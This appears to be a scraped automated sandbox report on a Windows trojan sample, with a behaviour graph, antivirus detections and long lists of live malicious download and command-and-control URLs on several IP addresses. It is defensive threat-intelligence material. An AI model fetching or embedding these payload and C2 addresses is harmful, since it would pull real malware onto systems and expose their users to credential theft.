                        DLL Side-Loading
                        12
                        Process Injection
                        Security Account Manager2
                        Process Discovery
                        SMB/Windows Admin Shares4
                        Data from Local System
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Deobfuscate/Decode Files or Information
                        NTDS251
                        Virtualization/Sandbox Evasion
                        Distributed Component Object ModelInput Capture112
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                        Obfuscated Files or Information
                        LSA Secrets1
                        Application Window Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                        Software Packing
                        Cached Domain Credentials2
                        File and Directory Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading
                        DCSync236
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467933 Sample: So7a8eQerR.exe Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 79 Snort IDS alert for network traffic 2->79 81 Multi AV Scanner detection for domain / URL 2->81 83 Found malware configuration 2->83 85 16 other signatures 2->85 8 explorti.exe 17 2->8         started        13 So7a8eQerR.exe 5 2->13         started        15 explorti.exe 2->15         started        process3 dnsIp4 75 77.91.77.82, 49730, 49733, 49734 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->75 77 77.91.77.81, 49731, 49753, 49901 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->77 63 C:\Users\user\AppData\...\586ef238b2.exe, PE32 8->63 dropped 65 C:\Users\user\AppData\...\37664d9843.exe, PE32 8->65 dropped 67 C:\Users\user\AppData\Local\...\random[1].exe, PE32 8->67 dropped 125 Hides threads from debuggers 8->125 127 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->127 129 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 8->129 17 37664d9843.exe 36 8->17         started        22 586ef238b2.exe 33 8->22         started        69 C:\Users\user\AppData\Local\...\explorti.exe, PE32 13->69 dropped 71 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 13->71 dropped 131 Detected unpacking (changes PE section rights) 13->131 133 Tries to evade debugger and weak emulator (self modifying code) 13->133 135 Tries to detect virtualization through RDTSC time measurements 13->135 24 explorti.exe 13->24         started        file5 signatures6 process7 dnsIp8 73 85.28.47.30, 49732, 49903, 80 GES-ASRU Russian Federation 17->73 47 C:\Users\user\AppData\...behaviorgraphIEHIDHJDB.exe, PE32 17->47 dropped 49 C:\Users\user\AppData\...\softokn3[1].dll, PE32 17->49 dropped 51 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 17->51 dropped 59 11 other files (7 malicious) 17->59 dropped 101 Antivirus detection for dropped file 17->101 103 Detected unpacking (changes PE section rights) 17->103 105 Tries to steal Mail credentials (via file / registry access) 17->105 121 3 other signatures 17->121 26 cmd.exe 1 17->26         started        28 cmd.exe 2 17->28         started        53 C:\Users\user\AppData\...\CBFIIEHJDB.exe, PE32 22->53 dropped 55 C:\Users\user\AppData\...\softokn3[1].dll, PE32 22->55 dropped 57 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 22->57 dropped 61 4 other files (2 malicious) 22->61 dropped 107 Machine Learning detection for dropped file 22->107 109 Found many strings related to Crypto-Wallets (likely being stolen) 22->109 111 Tries to harvest and steal ftp login credentials 22->111 113 Tries to harvest and steal browser information (history, passwords, etc) 22->113 30 cmd.exe 22->30         started        32 cmd.exe 22->32         started        115 Multi AV Scanner detection for dropped file 24->115 117 Tries to evade debugger and weak emulator (self modifying code) 24->117 119 Tries to detect virtualization through RDTSC time measurements 24->119 123 2 other signatures 24->123 file9 signatures10 process11 process12 34 GIEHIDHJDB.exe 26->34         started        37 conhost.exe 26->37         started        39 conhost.exe 28->39         started        41 CBFIIEHJDB.exe 30->41         started        43 conhost.exe 30->43         started        45 conhost.exe 32->45         started        signatures13 87 Machine Learning detection for dropped file 34->87 89 Tries to evade debugger and weak emulator (self modifying code) 34->89 91 Hides threads from debuggers 34->91 93 Antivirus detection for dropped file 41->93 95 Multi AV Scanner detection for dropped file 41->95 97 Detected unpacking (changes PE section rights) 41->97 99 3 other signatures 41->99

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        So7a8eQerR.exe42%ReversingLabsWin32.Trojan.Generic
                        So7a8eQerR.exe47%VirustotalBrowse
                        So7a8eQerR.exe100%AviraTR/Crypt.TPM.Gen
                        So7a8eQerR.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exe42%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe42%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe42%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe42%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        http://upx.sf.net0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                        https://support.mozilla.org0%URL Reputationsafe
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/softokn3.dll100%Avira URL Cloudmalware
                        http://77.91.77.81/mine/amadka.exe100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.phpQ0%Avira URL Cloudsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/softokn3.dllVr7100%Avira URL Cloudmalware
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe27%VirustotalBrowse
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.phpQ22%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/softokn3.dll0%VirustotalBrowse
                        http://77.91.77.81/cost/go.exe28%VirustotalBrowse
                        http://77.91.77.81/cost/go.exe100%Avira URL Cloudphishing
                        http://85.28.47.30/69934896f997d5bb/freebl3.dll100%Avira URL Cloudmalware
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/freebl3.dll=100%Avira URL Cloudmalware
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%Avira URL Cloudsafe
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/nss3.dllk100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpT9x-%0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/freebl3.dll0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/nss3.dlls100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.phpIR0%Avira URL Cloudsafe
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%VirustotalBrowse
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/nss3.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php(90%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpR&0%Avira URL Cloudsafe
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/nss3.dll0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php24%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.phpmespace0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/nss3.dll;W100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php100%Avira URL Cloudphishing
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dll4%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dll100%Avira URL Cloudmalware
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpmespace26%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php22%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php=0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dllK100%Avira URL Cloudmalware
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dll3100%Avira URL Cloudmalware
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dll0%VirustotalBrowse
                        http://85.28.47.30/920475a59bac849d.phpW100%Avira URL Cloudmalware
                        https://cdn.epnacl0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.php=21%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe00100%Avira URL Cloudphishing
                        http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                        https://mozilla.org0/0%Avira URL Cloudsafe
                        http://85.28.47.30/100%Avira URL Cloudmalware
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.php3693405117-2476756634-10020%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        http://85.28.47.30/4%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe0025%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/nss3.dllzW100%Avira URL Cloudmalware
                        http://85.28.47.30/920475a59bac849d.php100%Avira URL Cloudmalware
                        http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dll.s/100%Avira URL Cloudmalware
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%VirustotalBrowse
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dll100%Avira URL Cloudmalware
                        http://77.91.77.81/stealc/random.exe100%Avira URL Cloudmalware
                        http://77.91.77.81/cost/go.exeData100%Avira URL Cloudphishing
                        http://77.91.77.81/cost/go.exe00100%Avira URL Cloudphishing
                        http://77.91.77.81/mine/amadka.exea100%Avira URL Cloudphishing
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpGRJ0%Avira URL Cloudsafe
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.phpkR&0%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/softokn3.dllq100%Avira URL Cloudmalware
                        http://85.28.47.30/69934896f997d5bb/mozglue.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpaR(0%Avira URL Cloudsafe
                        https://cdn.ep0%Avira URL Cloudsafe
                        http://77.91.77.81/stealc/random.exeH100%Avira URL Cloudphishing
                        http://pki-ocsp.symauth.com00%Avira URL Cloudsafe
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dllvs100%Avira URL Cloudmalware
                        http://85.28.47.30100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php3R~0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe.phpefoxx100%Avira URL Cloudphishing
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://77.91.77.81/mine/amadka.exefalse
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.30/69934896f997d5bb/softokn3.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/freebl3.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phptrue
                        • 24%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.30/69934896f997d5bb/nss3.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dlltrue
                        • 4%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dlltrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/920475a59bac849d.phptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/msvcp140.dlltrue
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.81/stealc/random.exefalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/mozglue.dlltrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtab37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFEBGIDGCAFCBKECAAKJJKJEHDGC.15.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpQexplorti.exe, 00000003.00000002.4096195243.000000000144A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/softokn3.dllVr737664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://duckduckgo.com/ac/?q=37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exe586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • 28%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl0737664d9843.exe, 00000004.00000000.1782374348.00000000016B9000.00000080.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000933000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000000.3140997068.0000000000BD9000.00000080.00000001.01000000.0000000F.sdmp, 37664d9843.exe.3.dr, random[1].exe.3.dr, 586ef238b2.exe.3.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/freebl3.dll=586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/nss3.dllk586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr37664d9843.exe, 00000004.00000000.1782374348.00000000016B9000.00000080.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000933000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000000.3140997068.0000000000BD9000.00000080.00000001.01000000.0000000F.sdmp, 37664d9843.exe.3.dr, random[1].exe.3.dr, 586ef238b2.exe.3.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1737664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 37664d9843.exe, 00000004.00000003.1839531742.000000002385D000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmp, 586ef238b2.exe, 0000000F.00000003.3202674791.0000000022D8D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpT9x-%explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/nss3.dlls586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpIRexplorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php(9explorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpR&explorti.exe, 00000003.00000003.2038792093.0000000001502000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiECBGCGCGIEGCBFHIIEBF.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpmespaceexplorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 26%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search37664d9843.exe, 00000004.00000003.1847118263.0000000001F96000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmp, GCGHCBKF.15.dr, BAFCGIJD.4.drfalse
                        • URL Reputation: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/nss3.dll;W37664d9843.exe, 00000004.00000002.1962741464.0000000001F47000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpexplorti.exe, 00000003.00000002.4096195243.00000000014B8000.00000004.00000020.00020000.00000000.sdmptrue
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe37664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.0000000000248000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php=explorti.exe, 00000003.00000002.4096195243.0000000001488000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 21%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/69934896f997d5bb/sqlite3.dllK37664d9843.exe, 00000004.00000002.1962741464.0000000001F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.30/69934896f997d5bb/vcruntime140.dll3586ef238b2.exe, 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc9437664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001893000.00000004.00000020.00020000.00000000.sdmp, CAAKKFHCFIECAAAKEGCF.15.dr, ECBGCGCGIEGCBFHIIEBF.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.30/920475a59bac849d.phpW586ef238b2.exe, 0000000F.00000002.3332366463.000000000177E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.sqlite.org/copyright.html.37664d9843.exe, 00000004.00000002.1984219482.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360382541.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.epnacl586ef238b2.exe, 0000000F.00000002.3332366463.0000000001799000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exe0037664d9843.exe, 00000004.00000002.1957654994.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, 586ef238b2.exe, 0000000F.00000002.3328030922.00000000002A6000.00000040.00000001.01000000.0000000F.sdmpfalse
                        • 25%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
